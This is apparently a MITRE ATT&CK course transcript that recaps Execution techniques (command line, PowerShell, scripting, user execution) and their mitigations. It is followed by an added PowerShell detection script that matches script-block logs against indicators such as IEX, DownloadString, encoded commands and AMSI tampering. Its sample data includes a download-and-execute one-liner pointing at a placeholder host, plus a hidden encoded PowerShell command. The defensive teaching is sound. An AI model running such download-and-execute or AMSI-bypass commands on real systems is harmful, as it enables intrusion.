
Video Transcription

Hello, and congratulations on finishing the Execution phase of the MITRE ATT&CK framework. So you might be asking yourself at this point, what should we know? What did we go through? What did we look at? Well, we started with Command-Line Interface, and by the end of that we had defined what that was. We discussed some examples of common command line attack tools, and we also looked at mitigation and detection techniques, remembering that this could be any command line tool, not just the ones that are limited to Windows operating systems.

We also went through Execution through API. We reviewed what it was, some tools that you could use, and we looked at mitigation techniques and detection techniques as well in that particular section.

We then discussed Control Panel Items. We reviewed what that was, and methods for attacking using control panel items, such as the .CPL file extension that could be sent via phishing emails and things of that nature. We reviewed some mitigation techniques and detection techniques as well, again coming back to blocking malicious attachments and also user awareness training with respect to this type of file.

We then got into PowerShell, which could be considered a command line interface, but it warrants a separate discussion. We reviewed what PowerShell is, some of its uses, as well as mitigation techniques and detection techniques. Remember that least privilege should prevail here: if your end users don't need PowerShell, if they don't need to run scripts, if they don't need to do things of that nature using PowerShell, then it should not be permitted or allowed on the systems. Now, you could also set PowerShell up to only run as an administrator, but if a threat actor were able to get administrative access to a system or an administrative account, then they would be able to circumvent these controls. So it's also beneficial to have some form of analytics in place that would allow you to track activity that could be considered malicious, and not just standard PowerShell activity, because that could become quite a cumbersome and lengthy bit of information, so you want to trim it down.

Now, Scripting was also a separate discussion, where we talked about some different types of scripting as well as some tools. We talked about the Metasploit Framework and how it is essentially a combination of scripts that can be used for both good and evil. We also talked about PowerSploit, which is essentially a grouping of PowerShell scripts that can be used for malicious purposes as well as for security testing. And so we looked at some of those areas. We reviewed mitigation and detection techniques again: making sure that scripts cannot be run in the environment unless they're approved, making sure that scripting activity is reviewed on a regular basis, that you're logging scripting activity as it happens within the environment, and if there's any anomalous behavior noted, that it's reviewed and checked out.

We then finished things off in our discussions with User Execution, which is essentially when a user interacts with content. And so we talked about direct execution through things like attachment interaction and things of that nature, as well as, you know, going to websites, just general web surfing, and you hit a malicious site that interacts with your system and is then able to give a threat actor access or download payloads that may be malicious. We talked about some common file types that I'm sure you're familiar with: the .doc, PDF, Excel files and things of that nature. But we also talked about .txt files, text files, as not being able to run viruses and things of those natures. So if you ever see a text file in an attachment on an email, always ensure that you review that file carefully, that you don't just open it because you assume it's safe. Threat actors have some techniques where they can mask the extension or make the extension look like something that it is not, thereby fooling you into interacting with that file.

We talked about mitigation and detection techniques here, one of which was end user awareness training. And so we come back to that topic over and over again: educating users and telling them what is safe to click, what is not safe, how to evaluate the validity of an email, how to not just blindly trust information that's provided to them. I know that throughout this year we've seen a number of spoofing attacks, as well as phishing attacks related to high-level executives, owners of organizations and things of that nature, that are either the result of account compromise or a threat actor who knows who the CEO of an organization is, and in the attempt to spoof that user's email address, then get people to interact in a manner that they shouldn't.

Now, what we didn't list here was the case study. So I hope you've taken the time to go through that and to evaluate your organization and its controls, and hopefully that was beneficial to you in being able to possibly implement some new controls to help mitigate some risks.

So with that in mind, I want to thank you for your time today, and I look forward to seeing you again soon.
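The PowerShell point made in the recap (log scripting activity, then track only the activity that could be malicious rather than every script block) in working form. This is an added example, not code from the course or the instructor. It assumes Windows PowerShell 5.1 or later on Windows, where Script Block Logging writes event ID 4104 to the Microsoft-Windows-PowerShell/Operational log; the indicator list, the function names and the sample script blocks are constructed for illustration and are not from the page.

```powershell
# Added example: turn on PowerShell Script Block Logging and triage 4104 events
# for indicators that rarely appear in legitimate administrative scripts.
# Assumes PowerShell 5.1+ on Windows; the registry write and reading the
# Operational log both need an elevated session.

# Indicator patterns (constructed list; tune for your environment).
$SuspiciousPatterns = @(
    'FromBase64String',                                              # staging an encoded payload
    'Invoke-Expression|\bIEX\b',                                     # running a dynamically built string
    'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient',  # fetching a second stage
    '-EncodedCommand|-enc\b',                                        # encoded command line
    '-ExecutionPolicy\s+Bypass|-ep\s+bypass',
    '-NoProfile|-nop\b',
    '-WindowStyle\s+Hidden|-w\s+hidden',
    'Add-Type.*DllImport|VirtualAlloc|WriteProcessMemory',           # in-memory injection
    'AmsiUtils|amsiInitFailed'                                       # AMSI tampering
)

function Enable-ScriptBlockLogging {
    # Writes the same value the "Turn on PowerShell Script Block Logging" GPO sets.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 `
        -PropertyType DWord -Force | Out-Null
}

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    # Returns the indicator patterns the block matches (empty when nothing to flag).
    $hits = @($SuspiciousPatterns | Where-Object { $ScriptBlockText -match $_ })
    return $hits
}

function Get-SuspiciousScriptBlocks {
    param([int]$Hours = 24)
    # Event 4104 properties: 0=MessageNumber, 1=MessageTotal, 2=ScriptBlockText,
    # 3=ScriptBlockId, 4=Path
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $hits = Test-SuspiciousScriptBlock -ScriptBlockText $text
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time       = $_.TimeCreated
                User       = $_.UserId
                Indicators = ($hits -join '; ')
                Path       = $_.Properties[4].Value
                Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Offline demonstration on constructed script blocks (not real log data).
# Expected: the first is reported ok, the other two SUSPECT.
$Samples = @(
    'Get-ChildItem C:\Logs -Recurse | Where-Object Length -gt 1MB',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")',
    'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'
)
foreach ($s in $Samples) {
    $hits = Test-SuspiciousScriptBlock -ScriptBlockText $s
    '{0,-8} {1}' -f ($(if ($hits.Count -gt 0) { 'SUSPECT' } else { 'ok' }), $s)
}

# On a live host, from an elevated prompt:
#   Enable-ScriptBlockLogging
#   Get-SuspiciousScriptBlocks -Hours 24 | Format-Table -AutoSize
```

Two caveats a practitioner would want. First, an administrator can remove the registry value, so the setting belongs in Group Policy and the 4104 events should be forwarded off the host, otherwise the circumvention the recap describes (an attacker who already has administrative access) also takes the logging with it. Second, pattern matching on script text is a triage filter, not a verdict: tune the list against a baseline of your own administrators' scripts, and treat a hit as something to review rather than something to block outright.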

Up Next

Application of the MITRE ATT&CK Framework

This MITRE ATT&CK training is designed to teach students how to apply the matrix to help mitigate current threats. Students will move through the 12 core areas of the framework to develop a thorough understanding of various attack vectors.

Instructed By

Robert Smith
Director of Security Services at Corsica